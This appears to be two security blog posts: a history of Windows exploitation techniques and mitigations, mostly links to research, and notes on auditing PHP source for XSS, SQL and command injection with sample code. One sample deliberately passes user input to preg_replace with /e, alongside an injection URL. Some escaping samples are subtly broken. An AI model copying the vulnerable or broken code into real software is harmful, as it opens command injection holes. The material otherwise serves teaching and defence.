Past, Present, Future of Windows Exploitation

hi all

this is v0.1 of this post and in this post i’m going to have a review and brief history on exploitation with focus on windows .

this post will be  done III part :

  • part I     : brief history of buffer overflow
  • part II   : history of windows exploitation from windows 2000 to windows 7
  • part III : feature of exploitation

Part I  : brief history of buffer overflow

Starring : Robert morris , Aleph_one , Solar designer , Matt Conover , Casper Dik

it’s been long time after :

morris worm in 1988 (first known computer worm that used a buffer overflow to attack)

aleph one wrote Smashing The Stack For Fun Profit in phrack 49 in ~1996

so he start taking about detailed strcpy exploitation :

Matt Conover wrote first detailed heap overflow tutorial in 1999 heap tut

and solar designer wrote first generic heap exploit on windows netscape exploit

==============================================
at that times because of really low OS memory protections and also low application specific protections (can also called CPU and compilers problem !) , a poor input validation and an insecure memory copy was enough to corrupting memory (mostly in stack area) and overwriting a function return address and getting control of instruction pointer (IP , EIP) and then by storing malicious code (called shellcode) and using a pointer (mostly stack pointer (ESP)) execution flow can be change and pointer to attacker malicious (or educational ;) )  code.

so OS developers and security guys had to think about memory protections and casper dik in nov 1996 wrote a kernel run-time patch to implement non-executable-stacks for Solaris 2.4 to 2.5.1 http://seclists.org/bugtraq/1996/Nov/57

and later solar designer released same thing to remove executable permission for stack on the linux here

and around ~2000 solar designer made return-to-libc attacks to return in executable page and functions in memory for bypassing non-executable memory. the basic idea was  after controlling executing flow return to some function like system() and executing a single command or …. but there was a problem and the attacker was limit in payload selection and can’t use advanced payloads .

so around ~2000 we had :

  • basic / intermediate stack overflows
  • basic heap overflows
  • basic / intermediate format strings (killed so soon !)
  • basic memory protections
  • basic bypass memory protections
  • also some other type of memory corruptions (not so general)

=========================================

part II  : history of windows exploitation from windows 2000 to windows 7

Starring : Alexander Sotirov , Mark Dowd , John McDonald, Chris Valasek , Chris Anley , Brett Moore , David litchfield , Nicolas Waisman , Dave Aitel , Halvar Flake ,  Cesar Cerrudo , Matt Miller , ken johnson , S.K Chong ,  Dionysus Blazakis  , hd moore , FlashSky , Ruben Santamarta .

welcome to windows world !

i wanna start from windows 2000  final version of NT family because i think older windows are not interesting enough to talk about .

exploit developers golden age : microsoft was is supporting and making money from windows 2k and unfortunately forgot  protect you from buffer overflow attacks . so old and classic attacks works like a charm and just  maybe in some case  we saw very complex  and smart vulnerabilities but exploitation by itself was not that hard (maybe just some application specific filters / protections )

so because of that poor protection we saw great worms like :

blaster worm one of historic worms ever that used a RPC vuln for attack and fixed in http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx

and maybe you can remember : “billy gates why do you make this possible ? Stop making money and fix your software!! “

and this cool picture :


slammer worm a great and fast worm that used an SQL Server buffer overflow for attack. that fixed after 6 month !!! in :

http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx

sasser worm another great worm that used lsass remote overflow vulnerability and fixed in: http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

but there is a question these worms targeted windows XP and 2003 as well too ? yes !

because microsoft did  that great job in windows XP service pack 0 and 1 as well as windows 2003 service pack 0.

also we had lots of great and reliable exploits like :

DCOM RCP Exploit  here by flashsky (xfocus guy)

MS Windows (RPC DCOM) Remote Exploit here by hd moore

Great Kill Bill exploit here (targeting ANS.1) by Alexander Sotirov

MS Windows Plug-and-Play here by sl0ppy and houseofdabus and others .

also some GUI tools for easy exploitation for those even don’t know how they can compile and run an exploit like : RPC GUI v2 – r3L4x.exe

but why we had lots of juicy and clicky – clicky exploits ? there is two main reasons :

1- poor generic OS / application layer  memory protection

2- cool generic public memory exploitation related researches

classic windows stack overflows

lots of great and detailed papers in this area i just wanna link a few of them :

1- Win32 Buffer Overflows (Location, Exploitation and Prevention) by dark spyrit in 1999

http://www.phrack.com/issues.html?issue=55&id=15#article

2- S.K Chong Win32 Stack Based Buffer Overflow Walkthrough  in july 2002

http://www.scan-associates.net/papers/win32_bo_walkthrough.txt

3- Nish Bhalla’s series on  Writing Stack Based Overflows on Windows in 2005

http://www.packetstormsecurity.org/papers/win/

if i want to have brief description of them they all are talking about finding a reliable return address in  a reliable Dynamic Linked Library (MOST in OS DLL’s kernel32.dll ntdll.dll shell32.dll user32.dll and … ) and then after overwriting a function return address by sending big value to not good checked input variable and getting program execution flow redirect that flow to address in DLL that address is mostly JMP / call /  PUSH ESP (stack pointer)  or EBP (base pointer) because most of time in classic stack overflow attacker store her / his malicious code in the stack and a JMP / CALL / PUSH ESP RET will lead his / her to jump to start of shellcode .thats all!

classic windows heap overflows

1 –  Third Generation Exploitation smashing heap on 2k by halvar Flake in 2002

http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt

2- Exploiting the MSRPC Heap Overflow two part by Dave Aitel (MS03-026) sep 2003

http://freeworld.thc.org/root/docs/exploit_writing/msrpcheap.pdf

http://freeworld.thc.org/root/docs/exploit_writing/msrpcheap2.pdf

3- david litchfield did a great detailed penetration in black hat 2004

https://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt

if i want to have brief description of them they all are talking about exploiting unlink macro and using write4 (where + what) and actually ability of writing 4byte (32bit ) of selected address in memory by using specific function pointers like :

  • UnhandledExceptionFilter
  • VectoredExceptionHandling
  • RtlEnterCriticalSection
  • TEB Exception Handler
  • Application specific function pointer

…..

kernel based Windows overflows (not so classic)

because of Inexorability of  this type of attacks i want to share all of most notable history in this area here : (note that  i will back to heap and stack with protections after in it)

=================

First noticeable whitepaper that stated how to attack kernel based vulns on

windows was done by a Polish group called “sec-labs” around 2003 .

http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2003-08/0101.html

sec-lab old whitepaper : http://www.artofhacking.com/tucops/hack/windows/live/aoh_win32dcv.htm

sec-lab old exploit : http://www.securityfocus.com/bid/8329/info

(thanks Piotr Bania !)

1- Windows Local Kernel Exploitation by S.K Chong in 2004 (based on sec-lab research)

http://www.packetstormsecurity.org/hitb04/hitb04-sk-chong.pdf

http://www.scan-associates.net/papers/navx.c

2-Windows interrupt context kernel overflow exploit BY FLASHSKY in 2004

3- How to exploit Windows kernel memory pool in 2005 by SoBeIt

http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf

4- in 2005 eeye security published great paper about exploiting remote kernel overflows in windows

http://research.eeye.com/html/papers/download/StepIntoTheRing.pdf

5- later in 2005 matt miller published great article called Kernel-mode Payloads on Windows in uninformed

http://www.uninformed.org/?v=3&a=4&t=pdf

6- in 2006 johny cache hd moore and matt miller released Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/?v=6&a=2&t=pdf

7- in 2007 Jonathan Lindsay published and did a presentation in BH US 2007 called Attacking the Windows Kernel

http://www.blackhat.com/presentations/bh-usa-07/Lindsay/Whitepaper/bh-usa-07-lindsay-WP.pdf

8- same in  BH US 2007 Yuriy Bulygin did a peresentiation called Remote and Local Exploitation of Network Drivers

http://www.blackhat.com/presentations/bh-usa-07/Bulygin/Presentation/bh-usa-07-bulygin.pdf

9- in 2007 also Ruben Santamarta wrote Exploiting Comon Flaws In Drivers

http://www.reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

10- in 2008 Justin Seitz  wrote a paper and called I2OMGMT Driver Impersonation Attack

http://www.immunityinc.com/downloads/DriverImpersonationAttack_i2omgmt.pdf

in that paper Justin  talked about new type of kernel attacks and about i2OMGMT bug that founded by ruben.

11- later in 2008 Kostya Kortchinsky did a presentation called Real World Kernel Pool Exploitation

http://sebug.net/paper/Meeting-Documents/syscanhk/KernelPool.pdf

in that presentation kostya  talked about how he wrote exploit for ms08-001 (Microsoft marked it as not-exploitable !)

12- later in 2008 Cesar Cerrudo wrote Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8

  • artice :
  • http://www.argeniss.com/research/TokenKidnapping.pdf
  • poc 2k3:
  • http://www.argeniss.com/research/Churrasco.zip
  • poc 2k8:
  • http://www.argeniss.com/research/Churrasco2.zip

13- again later in 2008 mxtone wrote a paper called Analyzing local privilege escalations in win32k
http://www.uninformed.org/?v=10&a=2&t=pdf

in that paper he analyzed vulnerabilities and exploitation vector of win32k driver .

14- in ucon 2009  Stephen A. Ridley did a presentation called Intro to Windows Kernel Security Development
download it here

15- Tavis Ormandy, Julien Tinnes and great presentation called There’s a party at ring0 and you’re invited
http://www.cr0.org/paper/to-jt-party-at-ring0.pdf

16- in January 2010 Matthew “j00ru” Jurczyk and Gynvael Coldwind, Hispasec wrote a detailed paper called GDT and LDT in Windows kernel vulnerability exploitation.
http://vexillium.org/dl.php?call_gate_exploitation.pdf
in that  paper they describes some possible ways of exploiting kernel-mode write-what-where vulnerabilities in a stable manner

17- later  they did a presentation called Case Study of Recent Windows Vulnerabilities in HITB 2010

Windows memory protections !

OK so now we are going back to user-land this time with memory protections !

due to  lots of generic exploitation methods as well as lots of worms  ! Microsoft decided to use of memory protections in hardware and software layer. so from windows XP SP2 (Windows XP Tablet PC Edition 2005) , Windows Server 2003 Service Pack 1 (OS level) and from visual studio 2003 (compiler level) added lots of memory protections functionality.

here i’m going to have brief history of them and then  i will introduce  great researchers and their research against memory protections .

1- Data Execution Prevention (DEP)

DEP is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.

hardware-enforced DEP for CPUs that can mark memory pages as non-executable, and software-enforced DEP with a limited prevention for CPUs that do not have hardware support.

in windows XP SP2 and windows 2003 sp1 and sp2 you can get access on DEP setting by editing boot.ini in noexecute section.

there is four options :

1- OptIn : DEP only will work for all of windows services as well as  necessary programs.

2- OptOut: DEP  will work for all of windows services as well as  all of 3d-party installed program but you can add some process as            exception from controll panel.

3- AlwaysOn : fully protected by DEP no exception is acceptable.

4- AlwaysOff : Go to hell DEP , turns DEP off .

most of CPUs those are made after 2004 (AMD , Intel) can support hardware DEP.

read more on DEP : http://support.microsoft.com/kb/875352

/GS (Buffer Security Check)

GS (a.k.a stack cookie) is a compiler option that added from visual studio 2003 and will detects some buffer overruns that overwrite the return address, a common technique for exploiting code that does not enforce buffer size restrictions. This is achieved by injecting security checks into the compiled code.

so by using /GS flag compiler will add __security_init_cookie() function to your program and each time you want to overwrite a function return address you actually overwrite cookie as well and so comparison of cookie will fall so process will be terminate and you can’t use your return address.

for more detail read : http://msdn.microsoft.com/en-us/library/Aa290051

/SAFESEH

a linked option also system functionality added in visual studio 2005. when a program is linked with /SAFESEH in header of file will be contain of a acceptable Exception Handler Table. so each time an exception occurs and attacker wants overwrite a record from exception handler the ntdll dispatcher will understand this and will terminate program execution.

for more detail read : http://msdn.microsoft.com/en-us/library/9a89h429(VS.80).aspx

ASLR

Windows Vista, 2008 server, and Windows 7 offer yet another built-int security technique (like PAX), which randomizes the base addresses of executables, dll’s, stack and heap in a process’s address space (in fact, it will load the system images into 1 out of 256 random slots, it will randomize the stack for each thread, and it will randomize the heap as well).
in simple explanation if you want use an address in system in one of system dll’s   after your target system got restart your address is changed and not valid anymore so exploitation will fail again.

for more detail read : here

SEHOP

used in most modern windows operation systems like 2008 and 7 . the idea beyond this new mitigation comes from matt miller article called Preventing the Exploitation of SEH Overwrites. for detailed explanation of this protection just read flowing link :

http://blogs.technet.com/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx

Heap Protection

Microsoft also introduce to some new heap protections like heap meta cookie , safe unlinking , and in newer systems (after vista) function pointer obfuscation and so on …

==================================================

Advanced Windows Exploitation (bypassing filter and protections )

after 2005 exploitation getting harder and harder and number of public and “white-hat” hackers who can made a reliable multi platform exploit for modern windows OS was not too much.

in this section i want to have review on most important and noticeable researches against protections.

1- Third Generation Exploitation smashing heap on 2k by halvar Flake in 2002

http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt

windows 2k heap exploitation.

2- chris anley wrote Creating Arbitrary Shellcode In Unicode Expanded Strings

http://www.net-security.org/dl/articles/unicodebo.pdf

this was first public article about unicode based shellcode and is also known as “Venetian” shellcode. the method explained in this paper was good enough to making poor ASCII shellcodes .

3- Dave aitel advanced windows exploitation in 2003

http://www.immunityinc.com/downloads/immunity_win32_exploitation.final2.ppt

in that talk dave talked about no so typical windows exploitation and start making game more advanced .


4- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by david litchfield

http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf

this paper actually was first detailed paper about abusing SEH (structured exception handler)  and the generic way to bypass /GS  and also write not lots of public exploit are using this method for exploitation so it also can called one of most important research in windows exploitation history.

5- reliable heap exploits  (matt Conover  in cansecwest 2004 ) and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2)

http://cybertech.net/~sh0ksh0k/projects/winheap/XPSP2%20Heap%20Exploitation.ppt

i think that was one of most important heap related research in history of windows exploitation a great and gentle introduction to overwrite a chunk on lookaside list for bypassing safe unlinking and also give lots of great information  about windows heap manager internals .

6- later in 2004 matt miller wrote an article Safely Searching Process Virtual Address Space

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

this article was first great and public article about using egg-hunter shellcode and it’s about when we have limited memory space for our shellcode and we can store our big and main shellcode some-where in memory. this can be also called practical introduction to search shellcodes .

7- later in 2004  skylined wrote on IE exploit and used a technology called Heap Spray

http://www.exploit-db.com/exploits/612

heap spray is one of most important technologies even in modern exploitation and it’s about code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’ heap and fill the bytes in these blocks with the right values. They commonly take advantage from the fact that these heap blocks will roughly be in the same location every time the heap spray is run.

for a few years heap spray was just used in java script and mostly in browsers but today modern attackers are using anything possible to allocate more heap for sparing .  like action script , silver light , bmp files and … and not just in browsers !  from my point of view heap spray is like cheating in modern exploitation !

8- bypassing hardware-enforced DEP skape (matt miller) Skywing (ken johnson) (in October 2005)

http://www.uninformed.org/?v=2&a=4&t=pdf

yay ! they finally did it . hardware enforced DEP bypassed by using a return to libc style attack . in simple explanation  the problem was in not CPU the problem and weakness was in windows related API that was used for setting DEP for various process. and the API was NtSetInformationProcess. but there was some simple problem in that article like they forget talk about it we need to to have EBP always writable.

9- Exploiting Freelist[0] On XP Service Pack 2 by brett moore (dec 2005)

download here

this is was another great example of bypassing heap protections by using Freelist[0] and really useful is some case .

10 -  later in 2005 matt miller published great article called Kernel-mode Payloads on Windows in uninformed

http://www.uninformed.org/?v=3&a=4&t=pdf

this article was great article for porting exploits to kernel-land.

11-  in 2006 johny cache hd moore and matt miller released Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/?v=6&a=2&t=pdf

good example of real-world driver exploitation.

12-  in 2007  Ruben Santamarta wrote Exploiting Comon Flaws In Drivers

Read it here

note that before ruben we can find lots of great research about this topic but  ruben makes  it different . he  made a tool that called kartoffel which is a great driver fuzzer for finding IOCTL vulnerabilities  in drivers. but kartoffel was not main reason to make it different.

after he wrote kartofell and published lots of detailed advisories in various vendor drivers , windows driver exploitation got speed and changed to one of focusable area in exploitation .

13- Heap Feng Shui in JavaScript by Alexander sotirov (2007)

http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf

notable improvements to skylined heap spray technology . heap spray was good but blind and not so reliable is some case.  Heap Feng Shui is great research about doing advanced FU in heap  (heap manipulation) it will lead you to have more control on heap.

14- Understanding and bypassing Windows Heap Protection by Nicolas Waisman (2007)

http://kkamagui.springnote.com/pages/1350732/attachments/579350

nico is one of a few guys that focused on windows heap he also developed immunity debugger heaplib and did lots of great heap related researches. he is one of world leading heap !

15- Heaps About Heaps by brett moore (in 2008)

http://www.insomniasec.com/publications/Heaps_About_Heaps.ppt

that was one of most complete researches about heap. yes that is just a few slides but great hint if you want do something on heap !

16- Bypassing browser memory protections in Windows Vista  by Mark Dowd and Alex Sotirov (in 2008)

http://taossa.com/archive/bh08sotirovdowd.pdf

one of most greatest exploitation related research with a focus on bypassing browsers memory protections in vista .

great  generic .net shellcode trick (loading a .net dll and use shellcode in it),  java spraying , deep into  combined protections  and great ways to bypassing them.

17 – Attacking the Vista Heap by ben hawkes (in 2008)

http://www.ruxcon.org.au/files/2008/hawkes_ruxcon.pdf

great research about vista heap internals and some ways to bypassing vista heap protections.

18- Return oriented programming Exploitation without Code Injection by Hovav Shacham  (and others ) (in 2008)

http://cseweb.ucsd.edu/~hovav/dist/blackhat08.pdf

not a so new technology. it’s just our old code reuse ! but with great official introduction he call it  Return-Oriented-Programming (now known as ROP ). this technology is great to bypass permanent DEP (vista / 7 / 2008) (because you can’t use return-to-libc style attack anymore)

19- Cesar Cerrudo wrote Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 (2008)

http://www.argeniss.com/research/TokenKidnapping.pdf

20- Defeating DEP Immunity Way by Pablo sole (2008)

http://www.immunityinc.com/downloads/DEPLIB.pdf

first automation of ROP . thats it ;)

21- Practical Windows XP2003 Heap Exploitation (bh 2009) by John McDonald and Chris Valasek.

http://www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf

if you want write a heap exploit for modern OS . you should read this one . most complete heap related article .

22- Bypassing SEHOP  by Stefan Le Berre Damien Cauquil (in 2009)

http://www.sysdream.com/articles/sehop_en.pdf

cool and good research ! but ALSR will make it not so useful because SEHOP = SEHOP + ASLR

23- Interpreter Exploitation  : Pointer Inference and JIT Spraying by Dionysus Blazakis (2010)

http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf

http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf

Great ! exploitation is still alive . generic exploitation method for bypassing DEP and ASLR together . if you read and understand it you can write lots of exploits for windows 7 !

24- write-up of Pwn2Own 2010 by  Peter Vreugdenhil (2010)

http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf

a great and short article about how to own DEP+ASLR without any 3rd-party plugin

(used two vulnerability and toke around 4 minutes)

25- ruben santamarta all in one 0day presented in rootedCON (2010)

http://wintercore.com/downloads/rootedcon_0day_english.pdf

some great idea for bypassing IE XSS Filter and protected mod not exploitation specific but it’s great for being combined with other exploitation methods .

=========================================================

history of some not so typical windows exploits:

in this section i’m going to archive some of interesting exploits i saw you can learn lots of things from them !

1- one of first real-world HW-DEP bypass Exploit by devcode : here

2- bypassing DEP by returning into HeapCreate by toto : here

3- first public ASLR bypass exploit by using partial overwrite  by skape (matt miller) : here

4- heap spray and bypassing DEP by skylined : here

5- first public exploit that used ROP  for bypassing DEP in adobe lib TIFF vulnerability : here (is this case ASLR bypass is possible !)

6-  exploit codes of bypassing browsers memory protections : here

7-  Cesar Cerrudo PoC’s on Tokken TokenKidnapping .  PoC for  2k3: here , PoC 2k8: here

8- Tavis Ormandy KiTra0d an exploit works from win 3.1 to win 7 . PoC here (metasploit updated module works more interesting !)

9- old ms08-067 metasploit module multi-target and DEP bypass  PoC here

10- PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass (using ROP and Brute Forcing ASLR) PoC here

11- Stephen Fewer SMBv2 Exploit . PoC here

note 1  :there is lots of other interesting exploits in windows platform you can just find them in here and also here .

note 2: i saw lots of other great and advanced exploits in commercial packages . (they are commercial so forget them ;) )

===================================================

history of related windows exploitation books !

in this section i’m going to archive some books about windows exploitation.

1- Exploiting Software How to Break Code By (Greg Hoglund, Gary McGraw)

2- The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities (By Mark Dowd, John McDonald)

3- Buffer Overflow Attacks: Detect, Exploit, Prevent (by James C. Foster)

4- Windows Internals (by Mark Russinovich , David A. Solomon, Alex Ionescu)

5-  The Shellcoders Handbook Discovering and Exploiting Security

(by Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel Mehta, and Riley Hassell)

6- Software Vulnerability Guide ( by HERBERT H. THOMPSON , SCOTT G. CHASE)

7- ADVANCED WINDOWS DEBUGGING (by Mario Heward , Daniel Pravat)

8- Reversing: Secrets of Reverse Engineering

9- great step by step exploit writing tutorials by my friend Peter Van Eeckhoutte :


  1. Exploit writting tutorial part 1:Stack Based Overflowshere
  2. Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – here
  3. Exploit writting tutorial part 3: SEH Based Exploits – here
  4. Exploit writting tutorial part 3b: SEH Based Exploits - just another example  - here
  5. Exploit writting tutorial part 4: From Exploit to Metasploit – here
  6. Exploit writting tutorial part 5:  speed up basic exploit development – here
  7. Exploit writting tutorial part 6: Bypassing GS, SafeSeh, SEHOP, HW DEP and ASLR – here
  8. Exploit writting tutorial part 7: Unicode – from 0×00410041 to calc – here
  9. Exploit writting tutorial part 8: Win32 Egg Hunting - here
  10. Exploit writting tutorial part 9: Introduction to Win32 shellcoding – here

also he wrote a cool immunity debugger PyCommand called PveFindAddr i think this python script is necessary for speed-up exploit development for newbie or expert exploit developers and i found it so useful , it have some cool features like finding instructions for code reuse and ROP also finding state of memory protections and finding best return address in your situation.

this is not complete lits of exploitation related book / articles list i just listed those had at least one windows specific chapter .

PART III : Future of exploitation

Starring : T.B.A

1- exploitation is not and will not die.

2- just will change and being more harder also won’t be ” just for fun” like before.

3- writing reliable exploits will take time and time == money and now exploit development is acceptable specific job in security area !

4- fame == money as well (also is lovely by itself) .  so you will see other great researches in various security fields ;)

5- if you read all of resources exist in post you can be a great exploit developer ; )

PS1 : during writing this post due to lots of links and peoples on it maybe i forgot some notable people / article you can alert me about them just by shahin [at] abysssec.com

PS2 : i wrote this post so fast (and took long time !) i will edit my Misspellings and grammatical in good time.

i need to go and take 0XCC00FFEE .

have fun .

Additional notes in PHP source code auditing

Hi .
Today , I decide talk about some of my experience about methods of vulnerability discovery techniques through source code auditing .

if you remember , around 1 years ago , i wrote This article :

20 ways to php Source code fuzzing (Auditing)

some time ago “Stefan Esser” made The Poster on the PHP Security . I’m going to have a brief description about most them with my experience in PHP Source code Auditing :

Most PHP Vulnerability :

1-Cross Site Scripting (XSS)
2-Cross Site Request Forgery (CSRF)
3-SQL Injection
4-Insecure Session Handling
5-Session Fixation
6-Information Disclosure
7-Header Injection
8-Insecure Configuration
9-Weak randomness

(for more information about how to find this issue in your source code , read my article :
http://abysssec.com/blog/2009/03/php_fuzz_audit/
And another describe [ Finding vulnerabilities in PHP scripts FULL ( with examples )]:
http://www.milw0rm.com/papers/381

These problem due to inaccuracy in ((In summary):


I – Secure Input Handling
:
accept input from users without carefully to what is injected.

II – Sanitising :
Sanitizing functions can be used to “repair” user input, according to the application‘s restrictions (e.g. specific datatypes, maximum length) instead of rejecting potentially dangerous input entirely. In general, the use of sanitizing functions is not encouraged, because certain kinds and combinations of sanitizing filters may have security implications of their own. In addition, the automatic correction of typos could render the input syntactically or semantically incorrect.
for example :

  • is_numeric()Checks a variable for numeric content.
  • is_array()Checks if a variable is an array.
  • strlen()Returns a string‘s length.
  • strip_tags()Removes HTML and PHP tags.

III-  Escaping :
There are several different kinds of escaping:
• The backslash prefix “\” defines a meta character within strings. For Example: \t is a tab
space, \n is a newline character, … This can be of particular interest for functions where the newline character has a special purpose, e.g. header(). Within regular expressions the backslash is used to escape special characters, such as \. or \*, which is relevant for all functions handling regular expressions.

• HTML encoding translates characters normally interpreted by the web browser as HTML into their encoded equivalents – e.g. < is < or < or < and > is > or > or >. HTML encoding should be used for output handling, where user input should be reflected in HTML without injecting code. (See also: htmlentities())
• URL encoding makes sure, that every character
not allowed within URLs, according to RFC 1738, is properly encoded. E.g. space converts to + or %20 and < is %3C. This escaping is relevant for functions handling URLs, such as urlencode() and urldecode().

IV – Configuration :

Programming errors, including logic program.

well , we know there are 4 points that can help us in the process :

1 – Our PHP inputs Points :

[we need to find them and all functions and variables , that these have been assigned to them .]

input Point in PHP.Programing are :

$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS

2-  Limiting our understanding :

Very good , the second point : our problem begine here . we can’t find Problem in source code like the past . Because Programmers use the limitation function . for Example , wherever you see the fllowing functions that contol input variable , possibly as many attacks are carried out . so you have two solutions : find problem in logic of code or find PHP bug in PHP CORE !

A) Escaping and Encoding Functions :
A-1 (XSS dies = 90% The direct transition is a dream) :

• htmlspecialchars() , Escapes the characters & < and > as HTML entities to protect the application against XSS. The correct character set and the mode : ENT_QUOTES should be used.

1
2
3
<?php
echo "Hello " . htmlspecialchars( $_GET['name'], ENT_QUOTES);
?>

• htmlentities() , Applies HTML entity encoding to all applicable characters to protect the application against XSS. The correct character set and the mode ENT_QUOTES should be used.

1
2
3
<?php
echo "Hello " . htmlentities( $_GET['name'], ENT_QUOTES);
?>

( htmlentities() bypass in special case [utf7] : http://pstgroup.blogspot.com/2007/11/bypass-htmlentities.html )

• urlencode() , Applies URL encoding as seen in the query part of a URL.

1
2
3
<?php
$url = "http://www.example.com/" . "index.php?param=" . urlencode($_GET['pa']);
?>

A-2 : (SQL injection dies = 90% The direct transition is a dream) :
• addslashes() , Applies a simple backslash escaping. The input string is assumed to be single-byte encoded. addslashes() should not be used to protect against SQL injections, since most database systems operate with multi-byte encoded strings, such as UTF-8.
• addcslashes() , Applies backslash escaping. This can be used to prepare strings for use in a JavaScript string context. However, protection against HTML tag injection is not possible with this function.
(bypass addslashes() in special case : http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html)

• mysql_real_escape_string(), Escapes a string for use with mysql_query(). The character set of the current MySQL connection is taken into account, so it is safe to operate on multi-byte encoded strings.
Applications implementing string escaping as protection against SQL injection attacks should use this function.

1
2
3
<?php
$sql = "SELECT * FROM user WHERE" . " login='" . mysql_real_escape_string( $_GET['login'], $db) . "'";
?>

A-3 : (XSS , SQl Inject = 100% The direct transition is a dream) :
• preg_quote() , Should be used to escape user input to be inserted into regular expressions. This way the regular expression is safeguarded from semantic manipulations.
Fix code :

1
2
3
<?php
$repl = preg_replace('/^' . preg_quote($_GET['part'], '/'). '-[0-9]{1,4}/', '', $str);
?>

issue Code [Command Execute] :

1
2
3
4
<?php
$h = $_GET['h'];
echo preg_replace("/test/e",$h,"jutst test");
?>

It works like this: http://site.com/test.php?h=phpinfo()

• escapeshellarg() , Escapes a single argument of a shell command. In order to prevent shell code injection, single quotes in user input is being escaped and the whole string enclosed in single quotes.

1
2
3
<?php
system('resize /tmp/image.jpg' . escapeshellarg($_GET['w']).' '. escapeshellarg($_GET['h']));
?>

• escapeshellcmd() , Escapes all meta characters of a shell command in a way that no additional shell commands can be injected. If necessary, arguments should be enclosed in quotes.

1
2
3
<?php
system(escapeshellcmd( 'resize /tmp/image.jpg "' . $_GET['w']) . '" "' . $_GET['h']) . '"'));
?>


B- CType Extension :

By default, PHP comes with activated CType extension. Each of the following functions checks if all characters of a string fall under the described group of characters:

• ctype_alnum()alphanumeric characters – A-Z, a-z, 0-9
• ctype_alpha()alphabetic characters – A-Z, a-z
• ctype_cntrl() control characters – e.g. tab, line feed
• ctype_digit()numerical characters – 0-9
• ctype_graph()characters creating visible output e.g. no whitespace
• ctype_lower()lowercase letters – a-z
• ctype_print()printable characters
• ctype_punct()punctuation characters – printable characters, but not digits, letters or whitespace, e.g. .,!?:;*&$
• ctype_space()whitespace characters – e.g. newline, tab
• ctype_upper()uppercase characters – A-Z
• ctype_xdigit() hexadecimal digits – 0-9, a-f, A-F

1
2
3
4
5
<?php
if (!ctype_print($_GET['var'])) {
die("User input contains ". "non-printable characters");
}
?>

C – Filter Extension – ext/filter
Starting with PHP 5.2.0 the filter extension has provided a simple API for input validation and input filtering.
• filter_input()Retrieves the value of any GET, POST, COOKIE, ENV or SERVER variable and applies the specified filter.

1
2
3
<?php
$url = filter_input(INPUT_GET, 'url', FILTER_URL);
?>

• filter_var()Filters a variable with the specified filter.

1
2
3
<?php
$url = filter_var($var, FILTER_URL);
?>

List of Filters :
Validation Filters
• FILTER_VALIDATE_INTChecks whether the input is an integer numeric value.
• FILTER_VALIDATE_BOOLEANChecks whether the input is a boolean value.
• FILTER_VALIDATE_FLOATChecks whether the input is a floating point number.
• FILTER_VALIDATE_REGEXPChecks the input against a regular expression.
• FILTER_VALIDATE_URLChecks whether the input is a URL.
• FILTER_VALIDATE_EMAILChecks whether the input is a valid email address.
• FILTER_VALIDATE_IPChecks whether the input is a valid IPv4 or IPv6.

Sanitising Filters
• FILTER_SANITIZE_STRING / FILTER_SANITIZE_STRIPPEDStrips and HTML-encodes characters according to flags and applies strip_tags().
• FILTER_SANITIZE_ENCODEDApplies URL encoding.
• FILTER_SANITIZE_SPECIAL_CHARSEncodes ‘ ” < > & \0 and optionally all characters > chr(127) into numeric HTML entities.
• FILTER_SANITIZE_EMAILRemoves all characters not commonly used in an email address.
• FILTER_SANITIZE_URLRemoves all characters not allowed in URLs.
• FILTER_SANITIZE_NUMBER_INTRemoves all characters except digits and + -.
• FILTER_SANITIZE_NUMBER_FLOATRemoves all characters not allowed in floating point numbers.
• FILTER_SANITIZE_MAGIC_QUOTESApplies addslashes().

Other Filters
• FILTER_UNSAFE_RAWIs a dummy filter.
• FILTER_CALLBACKCalls a userspace callback function defining the filter.

D) HTTP Header Output

HTTP headers can be set using the header() function. User input should always be checked before being passed to header(), otherwise a number of security issues become relevant. Newline characters should never be used with header() in order to prevent HTTP header injections. Injected headers can be used for XSS and HTTP response splitting attacks, too. In general, user input should be handled in a context-sensitive manner.
Dynamic content within parameters to Location
or Set-Cookie headers should be escaped by urlencode().

For other HTTP header parameters, unintended context changes must be prevented as well; e.g. a semicolon separates several parameters within Content-Type.

1
2
3
4
<?php
if (strpbrk($_GET['type'], ";/\r\n")) die('invalid characters');
header("Content-Type: text/" . $_GET['type'] . "; charset=utf-8;");
?>

